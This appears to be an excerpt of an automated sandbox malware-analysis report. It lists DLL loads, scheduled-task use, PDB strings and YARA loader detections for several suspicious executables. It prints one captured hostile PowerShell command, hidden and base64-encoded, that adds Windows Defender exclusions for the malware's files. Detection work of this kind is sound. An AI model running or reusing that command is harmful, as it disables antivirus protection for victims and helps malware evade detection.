Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Section loaded: taskschd.dll
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Section loaded: sxs.dll
Source: C:\Users\user\Pictures\Illumination.pif	Section loaded: mscoree.dll
Source: C:\Users\user\Pictures\Illumination.pif	Section loaded: apphelp.dll
Source: C:\Users\user\Pictures\Illumination.pif	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Pictures\Illumination.pif	Section loaded: version.dll
Source: C:\Users\user\Pictures\Illumination.pif	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Pictures\Illumination.pif	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Pictures\Illumination.pif	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Pictures\Illumination.pif	Section loaded: uxtheme.dll
Source: C:\Users\user\Pictures\Illumination.pif	Section loaded: windows.storage.dll
Source: C:\Users\user\Pictures\Illumination.pif	Section loaded: wldp.dll
Source: C:\Users\user\Pictures\Illumination.pif	Section loaded: profapi.dll
Source: C:\Users\user\Pictures\Illumination.pif	Section loaded: cryptsp.dll
Source: C:\Users\user\Pictures\Illumination.pif	Section loaded: rsaenh.dll
Source: C:\Users\user\Pictures\Illumination.pif	Section loaded: cryptbase.dll
Source: C:\Users\user\Pictures\Illumination.pif	Section loaded: dwrite.dll
Source: C:\Users\user\Pictures\Illumination.pif	Section loaded: amsi.dll
Source: C:\Users\user\Pictures\Illumination.pif	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Section loaded: mscoree.dll
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Section loaded: apphelp.dll
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Section loaded: version.dll
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Section loaded: uxtheme.dll
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Section loaded: sspicli.dll
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Section loaded: cryptsp.dll
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Section loaded: rsaenh.dll
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Section loaded: cryptbase.dll
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Section loaded: wbemcomn.dll
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Section loaded: amsi.dll
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Section loaded: userenv.dll
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Section loaded: profapi.dll
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Section loaded: windows.storage.dll
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Section loaded: wldp.dll
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Section loaded: rasapi32.dll
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Section loaded: rasman.dll
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Section loaded: rtutils.dll
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Section loaded: mswsock.dll
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Section loaded: winhttp.dll
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Section loaded: iphlpapi.dll
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Section loaded: dhcpcsvc6.dll
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Section loaded: dhcpcsvc.dll
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Section loaded: dnsapi.dll
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Section loaded: winnsi.dll
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Section loaded: rasadhlp.dll
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Section loaded: fwpuclnt.dll
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Section loaded: propsys.dll
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Section loaded: edputil.dll
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Section loaded: urlmon.dll
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Section loaded: iertutil.dll
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Section loaded: srvcli.dll
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Section loaded: netutils.dll
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Section loaded: wintypes.dll
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Section loaded: appresolver.dll
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Section loaded: bcp47langs.dll
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Section loaded: slc.dll
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Section loaded: sppc.dll
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Section loaded: sxs.dll
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Section loaded: mpr.dll
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Section loaded: scrrun.dll
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Section loaded: linkinfo.dll
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Section loaded: ntshrui.dll
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Section loaded: cscapi.dll
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Section loaded: textinputframework.dll
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Section loaded: coreuicomponents.dll
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Section loaded: coremessaging.dll
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Section loaded: ntmarta.dll
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Section loaded: coremessaging.dll
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Section loaded: avicap32.dll
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Section loaded: msvfw32.dll
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Section loaded: winmm.dll
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: mscoree.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: apphelp.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: version.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: windows.storage.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: wldp.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: profapi.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: cryptsp.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: rsaenh.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: cryptbase.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: amsi.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: userenv.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: wbemcomn.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: sspicli.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: taskschd.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: xmllite.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: uxtheme.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: propsys.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: edputil.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: urlmon.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: iertutil.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: srvcli.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: netutils.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: wintypes.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: appresolver.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: bcp47langs.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: slc.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: sppc.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: mpr.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: pcacli.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: sfc_os.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: version.dll

Source: C:\Users\user\Desktop\trSK2fqPeB.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\trSK2fqPeB.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: trSK2fqPeB.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: trSK2fqPeB.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: trSK2fqPeB.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: F:\IlluminatedControls\Simple-Calculator-master\obj\Release\Simple Calculator.pdb source: trSK2fqPeB.exe
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: 52i.exe, 00000003.00000002.1805008168.00000202F8254000.00000004.00000800.00020000.00000000.sdmp, 52i.exe, 00000003.00000002.1805008168.00000202F8196000.00000004.00000800.00020000.00000000.sdmp, 52i.exe, 00000003.00000002.1750085970.00000202806B0000.00000004.08000000.00040000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000017.00000002.2247277729.000001CD290A4000.00000004.00000800.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000017.00000002.2247277729.000001CD290A2000.00000004.00000800.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000017.00000002.2051647717.000001CD18A95000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: F:\IlluminatedControls\Simple-Calculator-master\obj\Release\Simple Calculator.pdbb source: trSK2fqPeB.exe
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: 52i.exe, 00000003.00000002.1805008168.00000202F8254000.00000004.00000800.00020000.00000000.sdmp, 52i.exe, 00000003.00000002.1805008168.00000202F8196000.00000004.00000800.00020000.00000000.sdmp, 52i.exe, 00000003.00000002.1750085970.00000202806B0000.00000004.08000000.00040000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000017.00000002.2247277729.000001CD290A4000.00000004.00000800.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000017.00000002.2247277729.000001CD290A2000.00000004.00000800.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000017.00000002.2051647717.000001CD18A95000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: 52i.exe, 00000003.00000002.1805008168.00000202F80F5000.00000004.00000800.00020000.00000000.sdmp, 52i.exe, 00000003.00000002.1749075284.0000020280530000.00000004.08000000.00040000.00000000.sdmp, 52i.exe, 00000003.00000002.1805008168.00000202F8196000.00000004.00000800.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000025.00000002.2092329177.000002B28006E000.00000004.00000800.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000025.00000002.2158620640.000002B290676000.00000004.00000800.00020000.00000000.sdmp, SmLAztxc1o8yfogkJXrRjbDt.exe, 00000028.00000002.2065045219.0000018157F90000.00000004.00000800.00020000.00000000.sdmp, SmLAztxc1o8yfogkJXrRjbDt.exe, 00000028.00000002.2078804630.0000018168445000.00000004.00000800.00020000.00000000.sdmp, SmLAztxc1o8yfogkJXrRjbDt.exe, 00000028.00000002.2078804630.00000181684E6000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: 52i.exe, 00000003.00000002.1805008168.00000202F80F5000.00000004.00000800.00020000.00000000.sdmp, 52i.exe, 00000003.00000002.1749075284.0000020280530000.00000004.08000000.00040000.00000000.sdmp, 52i.exe, 00000003.00000002.1805008168.00000202F8196000.00000004.00000800.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000025.00000002.2092329177.000002B28006E000.00000004.00000800.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000025.00000002.2158620640.000002B290676000.00000004.00000800.00020000.00000000.sdmp, SmLAztxc1o8yfogkJXrRjbDt.exe, 00000028.00000002.2065045219.0000018157F90000.00000004.00000800.00020000.00000000.sdmp, SmLAztxc1o8yfogkJXrRjbDt.exe, 00000028.00000002.2078804630.0000018168445000.00000004.00000800.00020000.00000000.sdmp, SmLAztxc1o8yfogkJXrRjbDt.exe, 00000028.00000002.2078804630.00000181684E6000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Suspicious powershell command line found

Source: unknown

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwARwB1AGkAZABcAFQAeQBwAGUASQBkAC4AZQB4AGUALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAagBvAG4AZQBzAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwARwB1AGkAZABcAFQAeQBwAGUASQBkAC4AZQB4AGUA

Yara detected Costura Assembly Loader

Source: Yara match	File source: 38.2.YAPNXRPmcarcR4ZDgC81Tbdk.exe.209df7955a8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.2.SmLAztxc1o8yfogkJXrRjbDt.exe.18168265500.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.2.SmLAztxc1o8yfogkJXrRjbDt.exe.181682154c8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.2.SmLAztxc1o8yfogkJXrRjbDt.exe.18157f5e920.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.IIZS2TRqf69aZbLAX3cf3edn.exe.2b290535570.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.IIZS2TRqf69aZbLAX3cf3edn.exe.1cd28cec760.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.IIZS2TRqf69aZbLAX3cf3edn.exe.1cd28f455a8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.YAPNXRPmcarcR4ZDgC81Tbdk.exe.209cf255d60.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.52i.exe.202804d0000.1.raw.unpack, type: UNPACKEDPE
